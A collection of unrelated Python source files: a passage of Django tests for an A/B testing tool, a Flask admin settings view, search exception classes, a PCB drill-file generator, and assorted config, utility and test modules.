        experiment = self.create_test_experiment(name="old_name", tracks_finalized=True,
                assignment_method=Experiment.WEIGHTED_PROBABILITY_RANDOM)
        experiment_id = experiment.id
        num_experiments = Experiment.objects.count()
        no_tracks = experiment.tracks.count()
        experiment = {
                "name": "new_name", "notes": "hi", "uniformRandom": True,
                "csvUpload": False,
                "tracks": [{"id": None, "weighting": None, "name": "A"},
                           {"id": None, "weighting": None, "name": "B"},
                           {"id": None, "weighting": None, "name": "C"}]
        }
        response = self.client.post(
            reverse("ab_testing_tool_submit_edit_experiment", args=(experiment_id,)),
            follow=True, content_type="application/json", data=json.dumps(experiment)
        )
        self.assertOkay(response)
        self.assertEquals(num_experiments, Experiment.objects.count())
        experiment = Experiment.objects.get(id=experiment_id)
        self.assertEquals(experiment.assignment_method, Experiment.WEIGHTED_PROBABILITY_RANDOM)
        self.assertEquals(experiment.tracks.count(), no_tracks)
    
    def test_submit_edit_started_experiment_changes_existing_tracks(self):
        """ Tests that submit_edit_experiment does change track objects for
            an experiment that has not yet been started """
        experiment = self.create_test_experiment(name="old_name", tracks_finalized=False,
                assignment_method=Experiment.WEIGHTED_PROBABILITY_RANDOM)
        track1 = self.create_test_track(experiment=experiment, name="A")
        track2 = self.create_test_track(experiment=experiment, name="B")
        self.create_test_track_weight(experiment=experiment, track=track1)
        self.create_test_track_weight(experiment=experiment, track=track2)
        track_count = experiment.tracks.count()
        experiment_json = {
                "name": "new_name", "notes": "hi", "uniformRandom": False,
                "csvUpload": False,
                "tracks": [{"id": track1.id, "weighting": 30, "name": "C"},
                           {"id": track2.id, "weighting": 70, "name": "D"}]
        }
        response = self.client.post(
            reverse("ab_testing_tool_submit_edit_experiment", args=(experiment.id,)),
            follow=True, content_type="application/json", data=json.dumps(experiment_json)
        )
        self.assertOkay(response)
        experiment = Experiment.objects.get(id=experiment.id)
        self.assertEquals(experiment.assignment_method, Experiment.WEIGHTED_PROBABILITY_RANDOM)
        self.assertEquals(experiment.tracks.count(), track_count)
        track1 = experiment.tracks.get(id=track1.id)
        track2 = experiment.tracks.get(id=track2.id)
        self.assertEquals(track1.name, "C") #Checks name has changed
        self.assertEquals(track2.name, "D")
        self.assertEquals(track1.weight.weighting, 30) #Checks weighting has changed
        self.assertEquals(track2.weight.weighting, 70)
    
    def test_delete_experiment(self):
        """ Tests that delete_experiment method properly deletes a experiment when authorized"""
        first_num_experiments = Experiment.objects.count()
        experiment = self.create_test_experiment()
        self.assertEqual(first_num_experiments + 1, Experiment.objects.count())
        response = self.client.post(reverse("ab_testing_tool_delete_experiment", args=(experiment.id,)),
                                    follow=True)
        second_num_experiments = Experiment.objects.count()
        self.assertOkay(response)
        self.assertEqual(first_num_experiments, second_num_experiments)
    
    def test_delete_experiment_already_finalized(self):
        """ Tests that delete experiment doesn't work when experiments are finalized """
        experiment = self.create_test_experiment()
        experiment.update(tracks_finalized=True)
        first_num_experiments = Experiment.objects.count()
        response = self.client.post(reverse("ab_testing_tool_delete_experiment", args=(experiment.id,)),
                                    follow=True)
        second_num_experiments = Experiment.objects.count()
        self.assertError(response, EXPERIMENT_TRACKS_ALREADY_FINALIZED)
        self.assertEqual(first_num_experiments, second_num_experiments)
    
    @patch(LIST_MODULES, return_value=APIReturn([{"id": 0}]))
    def test_delete_experiment_has_installed_intervention_point(self, _mock1):
        """ Tests that delete experiment doesn't work when there is an associated
            intervention point is installed """
        experiment = self.create_test_experiment()
        first_num_experiments = Experiment.objects.count()
        ret_val = [True]
        with patch("ab_tool.canvas.CanvasModules.experiment_has_installed_intervention",
                   return_value=ret_val):
            response = self.client.post(reverse("ab_testing_tool_delete_experiment", args=(experiment.id,)),
                                        follow=True)
            second_num_experiments = Experiment.objects.count()
            self.assertError(response, INTERVENTION_POINTS_ARE_INSTALLED)
            self.assertEqual(first_num_experiments, second_num_experiments)
    
    def test_delete_experiment_unauthorized(self):
        """ Tests that delete_experiment method raises error when unauthorized """
        self.set_roles([])
        experiment = self.create_test_experiment()
        first_num_experiments = Experiment.objects.count()
        response = self.client.post(reverse("ab_testing_tool_delete_experiment", args=(experiment.id,)),
                                    follow=True)
        second_num_experiments = Experiment.objects.count()
        self.assertTemplateUsed(response, "ab_tool/not_authorized.html")
        self.assertEqual(first_num_experiments, second_num_experiments)
    
    def test_delete_experiment_nonexistent(self):
        """ Tests that delete_experiment method raises successfully redirects
            despite non-existent Experiment. This is by design, as the Http404
            is caught since multiple users may be editing the A/B dashboard on
            in the same course """
        self.create_test_experiment()
        t_id = NONEXISTENT_EXPERIMENT_ID
        first_num_experiments = Experiment.objects.count()
        response = self.client.post(reverse("ab_testing_tool_delete_experiment", args=(t_id,)), follow=True)
        second_num_experiments = Experiment.objects.count()
        self.assertEqual(first_num_experiments, second_num_experiments)
        self.assertOkay(response)
    
    def test_delete_experiment_wrong_course(self):
        """ Tests that delete_experiment method raises error for existent Experiment but for
            wrong course """
        experiment = self.create_test_experiment(course_id=TEST_OTHER_COURSE_ID)
        first_num_experiments = Experiment.objects.count()
        response = self.client.post(reverse("ab_testing_tool_delete_experiment", args=(experiment.id,)),
                                   follow=True)
        second_num_experiments = Experiment.objects.count()
        self.assertEqual(first_num_experiments, second_num_experiments)
        self.assertError(response, UNAUTHORIZED_ACCESS)
    
    def test_delete_experiment_deletes_intervention_point_urls(self):
        """ Tests that intervention_point_urls of a experiment are deleted when the experiment is """
        experiment = self.create_test_experiment()
        track1 = self.create_test_track(name="track1", experiment=experiment)
        track2 = self.create_test_track(name="track2", experiment=experiment)
        intervention_point = self.create_test_intervention_point()
        InterventionPointUrl.objects.create(intervention_point=intervention_point,
                                            track=track1, url="example.com")
        InterventionPointUrl.objects.create(intervention_point=intervention_point,
                                            track=track2, url="example.com")
        first_num_intervention_point_urls = InterventionPointUrl.objects.count()
        response = self.client.post(reverse("ab_testing_tool_delete_experiment", args=(experiment.id,)),
                                    follow=True)
        second_num_intervention_point_urls = InterventionPointUrl.objects.count()
        self.assertOkay(response)
        self.assertEqual(first_num_intervention_point_urls - 2, second_num_intervention_point_urls)
    
    def test_finalize_tracks(self):
        """ Tests that the finalize tracks page sets the appropriate course """
        experiment = Experiment.get_placeholder_course_experiment(TEST_COURSE_ID)
        self.assertFalse(experiment.tracks_finalized)
        self.create_test_track()
        response = self.client.post(reverse("ab_testing_tool_finalize_tracks", args=(experiment.id,)),
                                    follow=True)
        self.assertOkay(response)
        experiment = Experiment.get_placeholder_course_experiment(TEST_COURSE_ID)
        self.assertTrue(experiment.tracks_finalized)
    
    def test_finalize_tracks_missing_urls(self):
        """ Tests that finalize fails if there are missing urls """
        experiment = Experiment.get_placeholder_course_experiment(TEST_COURSE_ID)
        self.assertFalse(experiment.tracks_finalized)
        track1 = self.create_test_track(name="track1", experiment=experiment)
        self.create_test_track(name="track2", experiment=experiment)
        intervention_point = self.create_test_intervention_point()
        InterventionPointUrl.objects.create(intervention_point=intervention_point,
                                            track=track1, url="example.com")
        response = self.client.post(reverse("ab_testing_tool_finalize_tracks", args=(experiment.id,)), follow=True)
        self.assertOkay(response)
        experiment = Experiment.get_placeholder_course_experiment(TEST_COURSE_ID)
        self.assertFalse(experiment.tracks_finalized)
    
    def test_finalize_tracks_no_tracks(self):
        """ Tests that finalize fails if there are no tracks for an experiment """
        experiment = Experiment.get_placeholder_course_experiment(TEST_COURSE_ID)
        response = self.client.post(reverse("ab_testing_tool_finalize_tracks", args=(experiment.id,)),
                                    follow=True)
        self.assertError(response, NO_TRACKS_FOR_EXPERIMENT)
    
    def test_finalize_tracks_missing_track_weights(self):
        """ Tests that finalize fails if there are no track weights for an weighted
            probability experiment """
        experiment = self.create_test_experiment(assignment_method=Experiment.WEIGHTED_PROBABILITY_RANDOM)
        self.create_test_track(name="track1", experiment=experiment)
        response = self.client.post(reverse("ab_testing_tool_finalize_tracks", args=(experiment.id,)), follow=True)
        self.assertOkay(response)
        self.assertFalse(experiment.tracks_finalized)
    
    def test_copy_experiment(self):
        """ Tests that copy_experiment creates a new experiment """
        experiment = self.create_test_experiment()
        num_experiments = Experiment.objects.count()
        url = reverse("ab_testing_tool_copy_experiment", args=(experiment.id,))
        response = self.client.post(url, follow=True)
        self.assertOkay(response)
        self.assertEqual(Experiment.objects.count(), num_experiments + 1)
    
    def test_copy_experiment_unauthorized(self):
        """ Tests that copy_experiment fails when unauthorized """
        self.set_roles([])
        experiment = self.create_test_experiment()
        url = reverse("ab_testing_tool_copy_experiment", args=(experiment.id,))
        response = self.client.post(url, follow=True)
        self.assertTemplateUsed(response, "ab_tool/not_authorized.html")
    
    def test_copy_experiment_inavlid_id(self):
        """ Tests that copy_experiment fails with bad experiment_id """
        url = reverse("ab_testing_tool_copy_experiment", args=(12345,))
        response = self.client.post(url, follow=True)
        self.assertEquals(response.status_code, 404)
    
    def test_copy_experiment_wrong_course(self):
        """ Tests that copy_experiment fails if experiment is different coruse """
        experiment = self.create_test_experiment(course_id=TEST_OTHER_COURSE_ID)
        url = reverse("ab_testing_tool_copy_experiment", args=(experiment.id,))
        response = self.client.post(url, follow=True)
        self.assertError(response, UNAUTHORIZED_ACCESS)
    
    def test_delete_track(self):
        """ Tests that delete_track method properly deletes a track of an experiment when authorized"""
        experiment = self.create_test_experiment()
        track = self.create_test_track(experiment=experiment)
        self.assertEqual(experiment.tracks.count(), 1)
        response = self.client.post(reverse("ab_testing_tool_delete_track", args=(track.id,)),
                                    follow=True)
        self.assertEqual(experiment.tracks.count(), 0)
        self.assertOkay(response)
    
    def test_delete_nonexistent_track(self):
        """ Tests that delete_track method succeeds, by design, when deleting a nonexistent track"""
        experiment = self.create_test_experiment()
        self.assertEqual(experiment.tracks.count(), 0)
        response = self.client.post(reverse("ab_testing_tool_delete_track", args=(NONEXISTENT_TRACK_ID,)),
                                    follow=True)
        self.assertEqual(experiment.tracks.count(), 0)
        self.assertOkay(response)

#-*- coding: utf-8 -*-

from flask import current_app, flash, url_for, request
from flask_admin import expose, BaseView

from logpot.admin.base import AuthenticateView, flash_errors
from logpot.admin.forms import SettingForm
from logpot.utils import ImageUtil, getDirectoryPath, loadSiteConfig, saveSiteConfig

import os
from PIL import Image

class SettingView(AuthenticateView, BaseView):

    def saveProfileImage(self, filestorage):
        buffer = filestorage.stream
        buffer.seek(0)
        image = Image.open(buffer)
        image = ImageUtil.crop_image(image, 64)
        current_app.logger.info(image)
        dirpath = getDirectoryPath(current_app, '_settings')
        filepath = os.path.join(dirpath, "profile.png")
        image.save(filepath, optimize=True)

    @expose('/', methods=('GET','POST'))
    def index(self):
        form = SettingForm()

        if form.validate_on_submit():
            if form.profile_img.data:
                file = form.profile_img.data
                self.saveProfileImage(file)

            data = {}
            data['site_title']          = form.title.data
            data['site_subtitle']       = form.subtitle.data
            data['site_author']         = form.author.data
            data['site_author_profile'] = form.author_profile.data
            data['enable_link_github']  = form.enable_link_github.data
            data['enable_profile_img']  = form.enable_profile_img.data
            data["ogp_app_id"]          = form.ogp_app_id.data
            data["ga_tracking_id"]      = form.ga_tracking_id.data
            data["enable_twittercard"]  = form.enable_twittercard.data
            data["twitter_username"]    = form.twitter_username.data
            data['display_poweredby']   = form.display_poweredby.data
            if saveSiteConfig(current_app, data):
                flash('Successfully saved.')
            else:
                flash_errors('Oops. Save error.')
        else:
            flash_errors(form)

        data = loadSiteConfig(current_app)
        form.title.data               = data['site_title']
        form.subtitle.data            = data['site_subtitle']
        form.author.data              = data['site_author']
        form.author_profile.data      = data['site_author_profile']
        form.enable_link_github.data  = data['enable_link_github']
        form.enable_profile_img.data  = data['enable_profile_img']
        form.ogp_app_id.data          = data["ogp_app_id"]
        form.ga_tracking_id.data      = data["ga_tracking_id"]
        form.enable_twittercard.data  = data["enable_twittercard"]
        form.twitter_username.data    = data["twitter_username"]
        form.display_poweredby.data   = data['display_poweredby']
        return self.render('admin/setting.html', form=form)

# TODO When raising an exception pass a lambda function, the function being the module/path/name thing

ERROR = {'default': "Unknown engine error ({0})",
         400: "Bad request sent to search API ({0})",
         401: "Incorrect API Key ({0})",
         403: "Correct API but request refused ({0})",
         404: "Bad request sent to search API ({0})"}


class SearchException(Exception):
    """
    Abstract class representing an ifind search exception.

    """
    def __init__(self, module, message):
        """
        SearchException constructor.

        Args:
            module (str): name of module/class that's raising exception
            message (str): exception message to be displayed

        Usage:
            raise SearchException("Test", "this is an error")

        """
        message = "{0} - {1}".format(module, message)
        Exception.__init__(self, message)


class EngineConnectionException(SearchException):
    """
    Thrown when an Engine connectivity error occurs.
    Returns specific response message if status code specified.

    """
    def __init__(self, engine, message, code=None):
        """
        EngineException constructor.

        Args:
            engine (str): name of engine that's raising exception
            message (str): exception message to be displayed (ignored usually here)

        Kwargs:
            code (int): response status code of issued request

        Usage:
            raise EngineException("Bing", "", code=200)

        """
        self.message = message
        self.code = code

        if code:
            self.message = ERROR.get(code, ERROR['default']).format(self.code)

        SearchException.__init__(self, engine, self.message)


class EngineLoadException(SearchException):
    """
    Thrown when an Engine can't be dynamically loaded.

    """
    pass


class EngineAPIKeyException(SearchException):
    """
    Thrown when an Engine's API key hasn't been provided.

    """
    pass


class QueryParamException(SearchException):
    """
    Thrown when a query parameters incompatible or missing.

    """
    pass


class CacheConnectionException(SearchException):
    """
    Thrown when cache connectivity error occurs.

    """
    pass


class InvalidQueryException(SearchException):
    """
    Thrown when an invalid query is passed to engine's search method.

    """
    pass


class RateLimitException(SearchException):
    """
    Thrown when an engine's request rate limit has been exceeded.

    """
    pass
#!/usr/bin/python

import os
import re
from lxml import etree as et

import pcbmode.config as config
from . import messages as msg

# pcbmode modules
from . import utils
from .point import Point



def makeExcellon(manufacturer='default'):
    """
    """

    ns = {'pcbmode':config.cfg['ns']['pcbmode'],
          'svg':config.cfg['ns']['svg']} 

    # Open the board's SVG
    svg_in = utils.openBoardSVG()
    drills_layer = svg_in.find("//svg:g[@pcbmode:sheet='drills']",
                               namespaces=ns)

    excellon = Excellon(drills_layer)

    # Save to file
    base_dir = os.path.join(config.cfg['base-dir'], 
                            config.cfg['locations']['build'], 
                            'production')
    base_name = "%s_rev_%s" % (config.brd['config']['name'],
                               config.brd['config']['rev'])

    filename_info = config.cfg['manufacturers'][manufacturer]['filenames']['drills']

    add = '_%s.%s' % ('drills',
                      filename_info['plated'].get('ext') or 'txt')
    filename = os.path.join(base_dir, base_name + add)

    with open(filename, "wb") as f:
        for line in excellon.getExcellon():
            f.write(line)





class Excellon():
    """
    """

    def __init__(self, svg):
        """
        """

        self._svg = svg

        self._ns = {'pcbmode':config.cfg['ns']['pcbmode'],
                    'svg':config.cfg['ns']['svg']} 

        # Get all drill paths except for the ones used in the
        # drill-index
        drill_paths = self._svg.findall(".//svg:g[@pcbmode:type='component-shapes']//svg:path",
                                     namespaces=self._ns)

        drills_dict = {}
        for drill_path in drill_paths:
            diameter = drill_path.get('{'+config.cfg['ns']['pcbmode']+'}diameter')
            location = self._getLocation(drill_path)
            if diameter not in drills_dict:
                drills_dict[diameter] = {}
                drills_dict[diameter]['locations'] = []
            drills_dict[diameter]['locations'].append(location)

        self._preamble = self._createPreamble()
        self._content = self._createContent(drills_dict)
        self._postamble = self._createPostamble()


    def getExcellon(self):
        return (self._preamble+
                self._content+
                self._postamble)



    def _createContent(self, drills):
        """
        """
        ex = []
        for i, diameter in enumerate(drills):
            # This is probably not necessary, but I'm not 100% certain
            # that if the item order of a dict is gurenteed. If not
            # the result can be quite devastating where drill
            # diameters are wrong!
            # Drill index must be greater than 0
            drills[diameter]['index'] = i+1
            ex.append("T%dC%s\n" % (i+1, diameter)) 

        ex.append('M95\n') # End of a part program header

        for diameter in drills:
            ex.append("T%s\n" % drills[diameter]['index'])
            for coord in drills[diameter]['locations']:
                ex.append(self._getPoint(coord))

        return ex



    def _createPreamble(self):
        """
        """
        ex = []
        ex.append('M48\n') # Beginning of a part program header
        ex.append('METRIC,TZ\n') # Metric, trailing zeros
        ex.append('G90\n') # Absolute mode
        ex.append('M71\n') # Metric measuring mode        
        return ex



    def _createPostamble(self):
        """
        """
        ex = []
        ex.append('M30\n') # End of Program, rewind
        return ex



    def _getLocation(self, path):
        """
        Returns the location of a path, factoring in all the transforms of
        its ancestors, and its own transform
        """

        location = Point()

        # We need to get the transforms of all ancestors that have
        # one in order to get the location correctly
        ancestors = path.xpath("ancestor::*[@transform]")
        for ancestor in ancestors:
            transform = ancestor.get('transform')
            transform_data = utils.parseTransform(transform)
            # Add them up
            location += transform_data['location']

        # Add the transform of the path itself
        transform = path.get('transform')
        if transform != None:
            transform_data = utils.parseTransform(transform)
            location += transform_data['location']        

        return location




    def _getPoint(self, point):
        """
        Converts a Point type into an Excellon coordinate
        """
        return "X%.6fY%.6f\n" % (point.x, -point.y)




"""Run tests for the kmeans portion of the kmeans module"""

import kmeans.kmeans.kmeans as kmeans
import numpy as np
import random


def test_1dim_distance():
    """See if this contraption works in 1 dimension"""
    num1 = random.random()
    num2 = random.random()
    assert kmeans.ndim_euclidean_distance(num1, num2) == abs(num1-num2)


def test_ndim_distance():
    """Test to see if changing val by 1 does what it ought to do
    convert to float to integer because floating arithmetic makes testing
    analytic functions a mess"""
    rand = random.random
    point1 = [rand(), rand(), rand(), rand(), rand(), rand()]
    point2 = [point1[0]+1] + point1[1:] # just shift x to the right by 1
    assert int(round(kmeans.ndim_euclidean_distance(point1, point2))) == 1


def test_maxiters():
    """ensure the iteration ceiling works"""
  #  assert kmeans.should_iter([], [], iterations=29) == True
    assert kmeans.should_iter([], [], iterations=30) == False
    assert kmeans.should_iter([], [], iterations=31) == False


def test_random_centroid_dimensions():
    """ensure the correct number of dimensions"""
    dimensions = random.randrange(1, 100)
    k = random.randrange(1, 100)
    centroids = kmeans.random_centroids(k, dimensions)
    for centroid in centroids:
        assert len(centroid) == dimensions


def test_iterated_centroid():
    """ensure that the average across each dimension is returned"""
    new_centroid = kmeans.iterated_centroid([[1, 1, 1], [2, 2, 2]],\
            [[100, 200, 300]], [(0, 0), (1, 0)])
    np.testing.assert_allclose(new_centroid, np.array([[1.5, 1.5, 1.5]]),\
            rtol=1e-5)


"""
Django settings for ross project.

Generated by 'django-admin startproject' using Django 1.10.6.

For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/

For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""

import os

# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))


# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/

# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'jtn=n8&nq9jgir8_z1ck40^c1s22d%=)z5qsm*q(bku*_=^sg&'

# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True

ALLOWED_HOSTS = []


# Application definition

INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
]

MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]

ROOT_URLCONF = 'ross.urls'

TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]

WSGI_APPLICATION = 'ross.wsgi.application'


# Database
# https://docs.djangoproject.com/en/1.10/ref/settings/#databases

DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
    }
}


# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators

AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]


# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/

LANGUAGE_CODE = 'en-us'

TIME_ZONE = 'UTC'

USE_I18N = True

USE_L10N = True

USE_TZ = True


# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/

STATIC_URL = '/static/'

import re
import hashlib

FNAME_MATCH = re.compile(r'/([^/]+)$')  # From the last slash to the end of the string 
PREFIX = re.compile(r'([^:]+://)(/)?(.+)')  # Check for a prefix like data://


def getParentAndBase(path):
    match = PREFIX.match(path)
    if match is None:
        if path.endswith('/'):
            stripped_path = path[:-1]
        else:
            stripped_path = path
        base = FNAME_MATCH.search(stripped_path)
        if base is None:
            raise ValueError('Invalid path')
        parent = FNAME_MATCH.sub('', stripped_path)
        return parent, base.group(1)
    else:
        prefix, leading_slash, uri = match.groups()
        parts = uri.split('/')
        parent_path = '/'.join(parts[:-1])

        if leading_slash is not None:
            parent_path = '{prefix}/{uri}'.format(prefix=prefix, uri='/'.join(parts[:-1]))
        else:
            parent_path = '{prefix}{uri}'.format(prefix=prefix, uri='/'.join(parts[:-1]))
        return parent_path, parts[-1]


def pathJoin(parent, base):
    if parent.endswith('/'):
        return parent + base
    return parent + '/' + base


def md5_for_file(fname):
    hash_md5 = hashlib.md5()
    with open(fname, "rb") as f:
        for chunk in iter(lambda: f.read(4096), b""):
            hash_md5.update(chunk)
    return str(hash_md5.hexdigest())


def md5_for_str(content):
    hash_md5 = hashlib.md5()
    hash_md5.update(content.encode())
    return str(hash_md5.hexdigest())

"""
train supervised classifier with what's cooking recipe data
objective - determine recipe type categorical value from 20
"""
import time
from features_bow import *
from features_word2vec import *
from sklearn.preprocessing import StandardScaler
from sklearn.ensemble import RandomForestClassifier, ExtraTreesClassifier
from sklearn.linear_model import SGDClassifier
from sklearn.cross_validation import cross_val_score


""" main entry method """
def main(use_idf=False, random_state=None, std=False, n_jobs=-1, verbose=2):
    wc_idf_map = None
    if use_idf:
        # ingredients inverse document frequencies
        wc_components = build_tfidf_wc(verbose=(verbose > 0))
        wc_idf = wc_components['model'].idf_
        wc_idf_words = wc_components['model'].get_feature_names()
        wc_idf_map = dict(zip(wc_idf_words, wc_idf))
    # word2vec recipe feature vectors
    wc_components = build_word2vec_wc(feature_vec_size=120, avg=True, idf=wc_idf_map, verbose=(verbose > 0))
    y_train = wc_components['train']['df']['cuisine_code'].as_matrix()
    X_train = wc_components['train']['features_matrix']
    # standardize features aka mean ~ 0, std ~ 1
    if std:
        scaler = StandardScaler()
        scaler.fit(X_train)
        X_train = scaler.transform(X_train)
    # random forest supervised classifier
    time_0 = time.time()
    clf = RandomForestClassifier(n_estimators=100, max_depth=None,
        n_jobs=n_jobs, random_state=random_state, verbose=verbose)
    # perform cross validation
    cv_n_fold = 8
    print 'cross validating %s ways...' % cv_n_fold
    scores_cv = cross_val_score(clf, X_train, y_train, cv=cv_n_fold, n_jobs=-1)
    print 'accuracy: %0.5f (+/- %0.5f)' % (scores_cv.mean(), scores_cv.std() * 2)
    time_1 = time.time()
    elapsed_time = time_1 - time_0
    print 'cross validation took %.3f seconds' % elapsed_time


if __name__ == '__main__':
    main()

# -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2015-2018 CERN.
#
# Invenio is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.

"""Configuration options for Invenio-Search.

The documentation for the configuration is in docs/configuration.rst.
"""

#
# ELASTIC configuration
#

SEARCH_CLIENT_CONFIG = None
"""Dictionary of options for the Elasticsearch client.

The value of this variable is passed to :py:class:`elasticsearch.Elasticsearch`
as keyword arguments and is used to configure the client. See the available
keyword arguments in the two following classes:

- :py:class:`elasticsearch.Elasticsearch`
- :py:class:`elasticsearch.Transport`

If you specify the key ``hosts`` in this dictionary, the configuration variable
:py:class:`~invenio_search.config.SEARCH_ELASTIC_HOSTS` will have no effect.
"""

SEARCH_ELASTIC_HOSTS = None  # default localhost
"""Elasticsearch hosts.

By default, Invenio connects to ``localhost:9200``.

The value of this variable is a list of dictionaries, where each dictionary
represents a host. The available keys in each dictionary is determined by the
connection class:

- :py:class:`elasticsearch.connection.Urllib3HttpConnection` (default)
- :py:class:`elasticsearch.connection.RequestsHttpConnection`

You can change the connection class via the
:py:class:`~invenio_search.config.SEARCH_CLIENT_CONFIG`. If you specified the
``hosts`` key in :py:class:`~invenio_search.config.SEARCH_CLIENT_CONFIG` then
this configuration variable will have no effect.
"""


SEARCH_MAPPINGS = None  # loads all mappings and creates aliases for them
"""List of aliases for which, their search mappings should be created.

- If `None` all aliases (and their search mappings) defined through the
  ``invenio_search.mappings`` entry point in setup.py will be created.
- Provide an empty list ``[]`` if no aliases (or their search mappings)
  should be created.

For example if you don't want to create aliases
and their mappings for `authors`:

.. code-block:: python

    # in your `setup.py` you would specify:
    entry_points={
        'invenio_search.mappings': [
            'records = invenio_foo_bar.mappings',
            'authors = invenio_foo_bar.mappings',
        ],
    }

    # and in your config.py
    SEARCH_MAPPINGS = ['records']
"""

SEARCH_RESULTS_MIN_SCORE = None
"""If set, the `min_score` parameter is added to each search request body.

The `min_score` parameter excludes results which have a `_score` less than
the minimum specified in `min_score`.

Note that the `max_score` varies depending on the number of results for a given
search query and it is not absolute value. Therefore, setting `min_score` too
high can lead to 0 results because it can be higher than any result's `_score`.

Please refer to `Elasticsearch min_score documentation
<https://www.elastic.co/guide/en/elasticsearch/reference/current/
search-request-min-score.html>`_ for more information.
"""

SEARCH_INDEX_PREFIX = ''
"""Any index, alias and templates will be prefixed with this string.

Useful to host multiple instances of the app on the same Elasticsearch cluster,
for example on one app you can set it to `dev-` and on the other to `prod-`,
and each will create non-colliding indices prefixed with the corresponding
string.

Usage example:

.. code-block:: python

    # in your config.py
    SEARCH_INDEX_PREFIX = 'prod-'

For templates, ensure that the prefix `__SEARCH_INDEX_PREFIX__` is added to
your index names. This pattern will be replaced by the prefix config value.

Usage example in your template.json:

.. code-block:: json

    {
        "index_patterns": ["__SEARCH_INDEX_PREFIX__myindex-name-*"]
    }
"""

from __future__ import unicode_literals

from django.apps import AppConfig


class RfhistoryConfig(AppConfig):
    name = 'RFHistory'

import unittest
from polycircles import polycircles
from nose.tools import assert_equal, assert_almost_equal


class TestDifferentOutputs(unittest.TestCase):
    """Tests the various output methods: KML style, WKT, lat-lon and lon-lat."""

    def setUp(self):
        self.latitude = 32.074322
        self.longitude = 34.792081
        self.radius_meters = 100
        self.number_of_vertices = 36
        self.polycircle = \
            polycircles.Polycircle(latitude=self.latitude,
                                   longitude=self.longitude,
                                   radius=self.radius_meters,
                                   number_of_vertices=self.number_of_vertices)

    def test_lat_lon_output(self):
        """Asserts that the vertices in the lat-lon output are in the
        right order (lat before long)."""
        for vertex in self.polycircle.to_lat_lon():
            assert_almost_equal(vertex[0], self.latitude, places=2)
            assert_almost_equal(vertex[1], self.longitude, places=2)

    def test_lon_lat_output(self):
        """Asserts that the vertices in the lat-lon output are in the
        right order (lat before long)."""
        for vertex in self.polycircle.to_lon_lat():
            assert_almost_equal(vertex[0], self.longitude, places=2)
            assert_almost_equal(vertex[1], self.latitude, places=2)

    def test_vertices_equals_lat_lon(self):
        """Asserts that the "vertices" property is identical to the return
        value of to_lat_lon()."""
        assert_equal(self.polycircle.vertices, self.polycircle.to_lat_lon())

    def test_kml_equals_lon_lat(self):
        """Asserts that the return value of to_kml() property is identical to
        the return value of to_lon_lat()."""
        assert_equal(self.polycircle.to_kml(), self.polycircle.to_lon_lat())

if __name__ == '__main__':
    unittest.main()
# coding: utf-8

""" General utilities. """

from __future__ import division, print_function

__author__ = "adrn <adrn@astro.columbia.edu>"

# Standard library
import collections
import sys
import logging
import multiprocessing

# Third-party
import numpy as np

__all__ = ['get_pool']

# Create logger
logger = logging.getLogger(__name__)

class SerialPool(object):

    def close(self):
        return

    def map(self, *args, **kwargs):
        return map(*args, **kwargs)

def get_pool(mpi=False, threads=None):
    """ Get a pool object to pass to emcee for parallel processing.
        If mpi is False and threads is None, pool is None.

        Parameters
        ----------
        mpi : bool
            Use MPI or not. If specified, ignores the threads kwarg.
        threads : int (optional)
            If mpi is False and threads is specified, use a Python
            multiprocessing pool with the specified number of threads.
    """

    if mpi:
        from emcee.utils import MPIPool

        # Initialize the MPI pool
        pool = MPIPool()

        # Make sure the thread we're running on is the master
        if not pool.is_master():
            pool.wait()
            sys.exit(0)
        logger.debug("Running with MPI...")

    elif threads > 1:
        logger.debug("Running with multiprocessing on {} cores..."
                     .format(threads))
        pool = multiprocessing.Pool(threads)

    else:
        logger.debug("Running serial...")
        pool = SerialPool()

    return pool

def gram_schmidt(y):
    """ Modified Gram-Schmidt orthonormalization of the matrix y(n,n) """

    n = y.shape[0]
    if y.shape[1] != n:
        raise ValueError("Invalid shape: {}".format(y.shape))
    mo = np.zeros(n)

    # Main loop
    for i in range(n):
        # Remove component in direction i
        for j in range(i):
            esc = np.sum(y[j]*y[i])
            y[i] -= y[j]*esc

        # Normalization
        mo[i] = np.linalg.norm(y[i])
        y[i] /= mo[i]

    return mo

class use_backend(object):

    def __init__(self, backend):
        import matplotlib.pyplot as plt
        from IPython.core.interactiveshell import InteractiveShell
        from IPython.core.pylabtools import backend2gui

        self.shell = InteractiveShell.instance()
        self.old_backend = backend2gui[str(plt.get_backend())]
